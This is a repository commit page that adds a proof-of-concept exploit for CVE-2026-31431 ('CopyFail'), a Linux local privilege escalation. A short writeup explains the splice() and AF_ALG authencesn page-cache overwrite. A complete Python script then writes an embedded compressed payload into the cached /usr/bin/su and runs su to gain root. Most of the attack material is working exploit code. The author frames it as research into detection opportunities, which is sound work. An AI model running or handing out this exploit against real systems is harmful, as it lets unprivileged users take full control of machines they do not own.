0xvoodoo/PoCs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adding CopyFail - CVE-2026-31431

Browse Source
This commit is contained in:
0xVoodoo
2026-04-30 20:29:10 -06:00
parent 8c727d8f62
commit 4c80dfb1bf
3 changed files with 57 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CVE-2026-31431/CVE-2026-31431.md
+18
View File
@@ -0,0 +1,18 @@
# CopyFail | CVE-2026-31431 - Linux Privilege Escalation via Authencesn Scratch-Write Bug
Full writeup @ [my blog](https://0xvoodoo.sh/articles/copyfail/) | OG Writeup [here](https://xint.io/blog/copy-fail-linux-distributions#the-root-cause-page-cache-pages-in-the-writable-scatterlist-1)
This exploit has caused quite the panic among defenders, so I re-wrote/unminified [the original PoC](https://github.com/theori-io/copy-fail-CVE-2026-31431) to more easily look at detection opportunities.
In short, this exploit abuses the way `splice()` works and the AF_ALG socket type within [authencesn.c](https://github.com/torvalds/linux/blob/26fd6bff2c050196005312d1d306889220952a99/crypto/authencesn.c#L3) from the Linux crypto libraries. More or less, it allows the attacker to write 4 bytes of memory at a time to pagefiles, leading to the overwrite of the in-cache version of open files. When this is done with a SUID binary, like `/bin/su` the attacker is able to then execute the binary, which will pulls from the cache. This leaves the legit version of the overwritten binary in place while allowing arbitrary non-privileged users to gain root perms.
*Note* - this version needs at least Python 3.10
# License
GPL v3.0 - as all good software should be
Only use with explicit permission from the target system owner.
Remember - don't be a skid :)
CVE-2026-31431/CVE-2026-31431.py
+38
View File
@@ -0,0 +1,38 @@
import os, zlib, socket
def exploit(zlib_payload, su_file, counter):
listener = socket.socket(38, 5, 0)
listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
listener.setsockopt(279, 1, bytes.fromhex('0800010000000010'+'0'*64))
listener.setsockopt(279, 5, None, 4)
connection, _ = listener.accept()
connection.sendmsg([b"A"*4+zlib_payload], [(279, 3, b'\x00'*4), (279, 2, b'\x10'+b'\x00'*19), (279, 4, b'\x08' + b'\x00' * 3),], 32768)
stdin, stdout = os.pipe()
os.splice(su_file, stdout, counter + 4, offset_src=0)
os.splice(stdin, connection.fileno(), counter + 4)
try:
connection.recv(8 + counter)
except:
0
if __name__ == "__main__":
zlib_payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
su_file = os.open("/usr/bin/su", 0)
i = 0
while i < len(zlib_payload):
exploit(zlib_payload[i:i+4], su_file, i)
i += 4
os.system("su")
README.md
+1
View File
@@ -7,6 +7,7 @@ This repo contains proof of concept exploits for vulnerabilities I've come acros
- [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2023-23752) - Information disclosure in Joomla CMS. - [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2023-23752) - Information disclosure in Joomla CMS.
- [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2025-24893) - RCE in XWiki. - [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2025-24893) - RCE in XWiki.
- [CVE-2025-24071](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2025-24071) - Windows Explorer NTLM Hash Disclosure - [CVE-2025-24071](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2025-24071) - Windows Explorer NTLM Hash Disclosure
- [CVE-2026-31431](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2026-31431) - Linux LPE via Authencesn Scratch-Write Bug
# License # License
GPLv3 as all good software (or exploits I guess) should be. GPLv3 as all good software (or exploits I guess) should be.